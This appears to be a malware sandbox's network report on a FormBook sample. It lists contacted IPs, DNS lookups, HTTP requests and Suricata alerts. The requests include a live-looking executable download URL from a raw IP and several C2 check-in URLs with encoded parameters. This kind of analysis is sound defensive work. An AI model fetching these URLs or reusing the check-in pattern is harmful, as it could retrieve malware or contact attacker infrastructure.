NetWork | ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
11.15 01:11
wwbizsrvs.exe
11.15 01:11
op.exe
11.15 01:11
msf.exe
11.15 01:11
lum250.exe
11.15 01:11
msf443.exe
11.13 04:11
hello.exe
11.13 03:11
espsemhvcioff.exe
11.13 02:11
Geek_se.exe
11.13 02:11
cred64.dll
11.13 02:11
svhost.exe

Latest News
11.17 06:11
DIN-Download: Neue Vor...
11.17 06:11
IT Sicherheitsnews stü...
11.17 05:11
[AIS 2024 영상] 최원혁 누리랩 ...
11.17 05:11
[강연 영상] 김직동 개인정보위 과장 “...
11.17 05:11
Diese KI-Oma soll Betr...
11.17 05:11
ChatGPT knackt Rekord:...
11.17 05:11
Ancient TP-Link Backdo...
11.17 04:11
Malware Analysis - Wri...
11.17 03:11
Register Renaming: The...
11.17 02:11
Raspberry Pi’s ‘Once i...

NetWork | ZeroBOX

IP Address	Status	Action
107.172.148.217	Active	Moloch
164.124.101.2	Active	Moloch
3.64.163.50	Active	Moloch
34.102.136.180	Active	Moloch

Name	Response	Post-Analysis Lookup
www.hardscapesofflorida.com	CNAME hardscapesofflorida.com A 34.102.136.180	34.102.136.180
www.couturewrap.com	CNAME couturewrap.com A 34.102.136.180	34.102.136.180
www.fanatics-international.com	A 3.64.163.50	3.64.163.50

TCP Requests

UDP Requests

GET 200 http://107.172.148.217/544/hkcmd.exe

GET 403 http://www.couturewrap.com/btrd/?JDK8bDY=SG9A3Pt3xYazNmDlDw9fHiFSCreErl1UBTZXmuPCTcYswo69CAuXyrO6p7GwaEZoJbh+8dJR&BX=E2J4tHWP_V2

GET 403 http://www.hardscapesofflorida.com/btrd/?JDK8bDY=AmgPWBLkQfYgu+cImsHRMNogX0JnRzmL7Zrvmwd/vtKHrkREKDd630Yx4/ca2rifgVa1gRw7&BX=E2J4tHWP_V2

GET 410 http://www.fanatics-international.com/btrd/?JDK8bDY=Qks0PjRxOVp3YjLqM6UzXaXWzvTwLkvk8ayReQSORSiEbEol+Sszu0U7+SUPM2K7jvwZrDVw&BX=E2J4tHWP_V2

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 107.172.148.217:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 107.172.148.217:80 -> 192.168.56.103:49162	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 192.168.56.103:49169 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 107.172.148.217:80 -> 192.168.56.103:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49170 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 107.172.148.217:80 -> 192.168.56.103:49162	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 107.172.148.217:80 -> 192.168.56.103:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 3.64.163.50:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 3.64.163.50:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 3.64.163.50:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts